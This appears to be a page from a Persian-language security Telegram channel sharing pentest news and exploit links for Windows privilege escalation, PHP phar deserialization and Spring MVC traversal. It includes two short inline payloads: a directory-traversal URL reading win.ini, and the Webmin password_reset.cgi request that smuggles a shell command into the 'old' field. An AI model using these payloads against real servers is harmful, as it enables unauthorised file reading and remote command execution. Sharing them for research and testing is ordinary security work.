امنیت اطلاعات
847 subscribers
2.38K photos
153 videos
156 files
2.58K links
آخرین اخبار هک، ابزارها و روش های تست نفوذ را در این کانال دنبال کنید

بخش انگلیسی :
https://t.iss.one/sec_nerd_en


برای عضویت در گروه پیام بدید:
@rect00
Download Telegram
بالا بردن سطح دسترسی یوزر ویندوز تا سطح SYSTEM با سوء استفاده از Osquery

CVE-2019-3567

https://offsec.provadys.com/osquery-windows-acl-misconfiguration-eop.html


#windows
#privesc
#pentest


@sec_nerd
شرح آسیب پذیری deserialization در phar


https://paper.seebug.org/988/



#php
#poi
#exploit
#writeup


@sec_nerd
[PoC] Analysis of Spring MVC Directory Traversal Vulnerability (CVE-2018-1271)

https://localhost:8080/spring-mvc-showcase/resources/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini

(link: https://paper.seebug.org/991/) paper.seebug.org/991/


#exploit
#Poc


@sec_nerd
"Webmin 0day remote code execution"


PoC:
/password_reset.cgi
user=root&pam&expired&old=wrong | id


https://pentest.com.tr/exploits/DEFCON-Webmin-1920-Unauthenticated-Remote-Command-Execution.html



#webmin
#exploit
#rce


@sec_nerd
راهکارهای جایگزین برای دستیابی به سطح دسترسی SYSTEM در ویندوز


https://blog.xpnsec.com/becoming-system/


#windows
#privesc
#pentest


@sec_nerd